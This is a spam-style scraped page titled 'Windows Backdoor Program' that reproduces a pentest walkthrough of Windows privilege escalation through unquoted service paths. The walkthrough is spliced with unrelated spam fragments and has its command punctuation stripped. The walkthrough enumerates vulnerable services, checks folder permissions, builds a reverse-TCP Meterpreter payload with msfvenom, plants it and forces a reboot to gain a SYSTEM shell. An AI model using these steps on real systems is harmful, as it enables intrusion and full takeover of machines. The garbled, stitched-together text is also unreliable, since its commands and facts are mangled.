Windows Backdoor Program

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Windows Backdoor Program' title='Windows Backdoor Program' />Windows Privilege Escalation Methods for Pentesters Pentest Blog. Imagine that you have gotten a low priv Meterpreter session on a Windows machine. Probably youll run getsystem to escalate your privileges. But what if it fails Dont panic. There are still some techniques you can try. Unquoted Service Paths. Basically, it is a vulnerability that occurs if a service executable path is not enclosed with quotation marks and contains space. To identify these unquoted services you can run this command on Windows Command Shell wmic service get name,displayname,pathname,startmode findstr i Auto findstr i v C Windows findstr i v All services with unquoted executable paths will be listed meterpreter shell. Process 4. 02. 4 created. Channel 1 created. Microsoft Windows Version 6. Microsoft Corporation. All rights reserved. C UserstestuserDesktop wmic service get name,displayname,pathname,startmode findstr i Auto findstr i v C Windows findstr i v. Auto findstr i v C Windows findstr i v. In computer security and cryptography, NSAKEY was a variable name discovered in Windows NT 4 Service Pack 5 which had been released unstripped of its symbolic. Lets assume that you have just cracked victims windows password. Can you make some changes in windows so that you. Qv_qW-9jQ/hqdefault.jpg' alt='Windows Backdoor Program' title='Windows Backdoor Program' />Windows Backdoor ProgramVulnerable Service Vulnerable Service C Program Files x. Program FolderA SubfolderExecutable. Auto. C UserstestuserDesktop If you look at the registry entry for this service with Regedit you can see the Image. Path value is C Program Files x. Program FolderA SubfolderExecutable. It should be like this C Program Files x. Program FolderA SubfolderExecutable. Sprint Spc Calculator. When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find C Program. C Program Files. Windows Backdoor ProgramC Program Files x. Program. exe. C Program Files x. Program FolderA. C Program Files x. Program FolderA SubfolderExecutable. This vulnerability is caused by the Create. Process function in Windows operating systems. For more information click read this article. If we can drop our malicious exe successfully on one of these paths, upon a restart of the service, Windows will run our exe as SYSTEM. But we should have necessary privileges on one of these folders. In order to check the permissions of a folder, we can use built in Windows tool, icals. Lets check permissions for C Program Files x. Runas is a very useful command on Windows OS. This command enables one to run a command in the context of another user account. One example scenario where this could. Were putting the word out that everyone should follow Apples guidance and uninstall QuickTime for Windows as soon as possible. This is for two reasons. First. Program Folder folder meterpreter shell. Process 1. 88. 4 created. Channel 4 created. Microsoft Windows Version 6. Microsoft Corporation. All rights reserved. C Program Files x. Program Folder icacls C Program Files x. Program Folder. icacls C Program Files x. Program Folder. C Program Files x. Program Folder Everyone OICIF. NT SERVICETrusted. Installer IF. ESET NOD32 Antivirus is a popular choice for users looking to ensure PC protection against viruses, Trojans, worms, rootkits, dialers and other types of. NT SERVICETrusted. Installer ICIIOF. NT AUTHORITYSYSTEM IF. NT AUTHORITYSYSTEM IOICIIOF. BUILTINAdministrators IF. BUILTINAdministrators IOICIIOF. BUILTINUsers IRX. BUILTINUsers IOICIIOGR,GE. CREATOR OWNER IOICIIOF. APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES IRX. APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES IOICIIOGR,GE. Successfully processed 1 files Failed processing 0 files. C Program Files x. Program Folder. What a luck As you can see, Everyone has full control on this folder. F Full Control. CI Container Inherit This flag indicates that subordinate containers will inherit this ACE. OI Object Inherit This flag indicates that subordinate files will inherit the ACE. This means we are free to put any file to this folderFrom now on, what youre going to do depends on your imagination. I simply preferred to generate a reverse shell payload to run as SYSTEM. MSFvenom can be used for this job email protected msfvenom p windowsmeterpreterreversetcp e x. LHOST1. 92. 1. 68. LPORT8. 98. 9 f exe o A. No platform was selected, choosing Msf Module Platform Windows from the payload. No Arch selected, selecting Arch x. Found 1 compatible encoders. Attempting to encode payload with 1 iterations of x. Payload size 3. 60 bytes. Final size of exe file 7. Saved as A. exe. Lets place our payload to C Program Files x. Program Folder folder meterpreter getuid. Server username TARGETMACHINEtestuser. Program Files x. Program Folder. Listing C Program Files x. Program Folder. Mode Size Type Last modified Name. A Subfolder. meterpreter upload f A. A. exe A. exe. A. A. exe. Listing C Program Files x. Program Folder. Mode Size Type Last modified Name. A Subfolder. 1. 00. A. exe. meterpreter. At the next start of the service, A. SYSTEM. Lets try to stop and restart the service meterpreter shell. C Programming Book By Sumita Arora Pdf. Process 1. 60. 8 created. Channel 2 created. Microsoft Windows Version 6. Microsoft Corporation. All rights reserved. C UserstestuserDesktop sc stop Vulnerable Service. Vulnerable Service. SC Open. Service FAILED 5. Access is denied. C UserstestuserDesktop. Access is denied because we dont have permission to stop or start the service. However, its not a big deal, we can wait for someone to restart the machine, or we can do it ourselves with shutdown command C UserstestuserDesktop shutdown r t 0. C UserstestuserDesktop. Meterpreter session 8 closed. Reason Died. As you can see, our session has died. Well never forget you low priv shell. RIP. Our target machine is restarting now. Herdeiro Do Diabo Dublado. Soon, our payload will work as SYSTEM. We should start a handler right away. Started reverse TCP handler on 1. Starting the payload handler. Sending stage 9. Meterpreter session 1 opened 1. Server username NT AUTHORITYSYSTEM. Meterpreter session 1 closed. Reason Died. Now we have gotten a Meterpreter shell with SYSTEM privileges. High five But wait, why did our session die so quickly We just started No need to worry. Its because, when a service starts in Windows operating systems, it must communicate with the Service Control Manager. If its not, Service Control Manager thinks that something is not going well and terminates the process. All we need to do is migrating to another process before the SCM terminates our payload, or you can consider using auto migration. BTW there is a Metasploit module for checking and exploiting this vulnerability exploitwindowslocaltrustedservicepath. This module only requires that you link it to an existing Meterpreter session before running msf use exploitwindowslocaltrustedservicepath. Module options exploitwindowslocaltrustedservicepath. Name Current Setting Required Description. SESSION yes The session to run this module on. Exploit target. However, its always good to know the internals. If you want to demonstrate this vulnerability yourself, you can add a vulnerable service to your test environment C WindowsSystem. Vulnerable Service bin. Path C Program Files x. Program FolderA SubfolderExecutable. C WindowsSystem. C Program Files x. C Program Files x. Program FolderA Subfolder. C Program Files x. C Program Files x. Program Folder grant Everyone OICIF T. Services with Vulnerable Privileges. You know, Windows services run as SYSTEM. So, their folders, files, and registry keys must be protected with strong access controls. In some cases, we encounter services that are not sufficiently protected. Insecure Registry Permissions. In Windows, information related to services is stored in HKLMSYSTEMCurrent. Control. SetServices registry key.